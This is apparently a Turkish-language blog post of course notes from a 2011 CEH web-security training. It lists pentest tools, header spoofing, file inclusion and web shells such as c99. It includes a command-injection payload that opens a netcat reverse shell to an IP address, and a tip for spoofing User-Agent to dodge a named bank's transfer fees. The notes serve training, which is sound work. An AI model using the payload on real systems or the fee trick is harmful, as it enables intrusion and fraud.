- shodanhq.com/exploits => şimdiye kadar çıkmış açıklıkların aratılabileceği, google'a alternatif, exploitlere özel arama motoru.
- LoginFinder. Windows tarafında çalışan bir uygulama. Uygulamalardaki sadece login ekranlarını bulmaya yarıyor.
- Paros artık geliştirilmeyen bir ürün.
- Owasp ZAP => Paros'un yeni versiyonu gibi değerlendirilebilir.
- Flash decompile edilebilir, içinde user/pwd barındırıyor olabilir. Flash testlerinde aklında olsun!
- x-forward-for. İncele!!! Bu özelliğin aktif olduğu proxylerde talep başka IP'den gelmiş gibi yorumlar bırakabilir saldırgan sunucuya. IP spoofing normal şartlarda yapılamaz ama bu durumda IP spoofing yapılıyor gibi istekler gönderilebilir işte!
- Gelen talebin mobil cihazdan mı, PC'den web üzerinden mi geldiğinianlamanın yolu User-Agent header'ıdır. Bu da client tarafından doldurulan bir alan olduğundan rahatlıkla değişitirlebilir.
- Bu konuya örnek Garanti'nin mobil cihazlar üzerinden yapılan EFT'lerden ücret almaması. User-Agent ile oynayıp talep mobil cihazdan gidiyormuş gibi göstererek EFT'ye ücret ödemez.
- Genel Düstur: Kullanıcıdan gelen bilgiye kesinlikle güvenilmez.
- Flash scanner: swfscan!!!
- XSS ile ilgili kitap: XSS Exploits.
- testfire.net => DVWA gibi bir site.
- TinKode security blog => Hackliyor ve sonuçlarını sitesinde yayınlıyor.
- SQLi araçları: Pangolin, Havij. İncele!!!
- Command Injection Exploitation: ";nc -e /bin/bash 192.168.200.12 443" => shell açma.
- -e ile sonrasından gelen file'ı çalıştır diyoruz.
- File Inclusion
- Local (LFI)
- Remote (RFI)
- ha.ckers.org/weird/rfi-locations.dat => RFI zafiyeti içeren URL kalıpları
- Upload yapmaya izin veren sitelere dikkat (forumlarda avatar upload'u mesela)
- Web Shell. Hacklenen sunucuları daha kolay yönetmek için yazılmış web uygulamaları.
- R57 en popülerlerinden biriydi. İfşa olduğundan artık kullanılmıyor.
- c99.php dosyası DVWA'nın RFI testinde shell açmak için upload edilebilecek dosya. Dosyanın neler yaptığına DİKKAT! Test ettiğimiz makineyi kamuya mal etmeyelim...
Önceleri web uygulama güvenliğine özel olması düşünülen blog, daha sonra diğer sızma testleri konularını da kapsayacak şekilde genişletilmiştir.
5 Mayıs 2011 Perşembe
CEH by BGA - Gün 4 - Ders 2-3
Web Uygulama Güvenliği (Devamı)
Kaydol:
Kayıt Yorumları (Atom)
Web Uygulama Sızma Testleri İçin Kontrol Listeleri - V
Checklist for Web App Pentesting - V 6. Veri Denetimi (Data Validation) Testleri 6.1 Girdi Denetimi Bütün girdiler denetlenmelidir....
-
& (%26) URL sorgu tümcesindeki parametreleri mesaj gövdesinden ayırmada kullanılır. = (%3d) URL sorgu tümcesindeki parametrelerin i...
-
Checklist for Web App Pentesting - V 6. Veri Denetimi (Data Validation) Testleri 6.1 Girdi Denetimi Bütün girdiler denetlenmelidir....
-
OWASP'ın 2010 yılı için açıkladığı en önemli 10 güvenlik riski ve bunlar için en faydalı araçlardan birer örnek, bu yazının konusunu ol...
Hiç yorum yok:
Yorum Gönder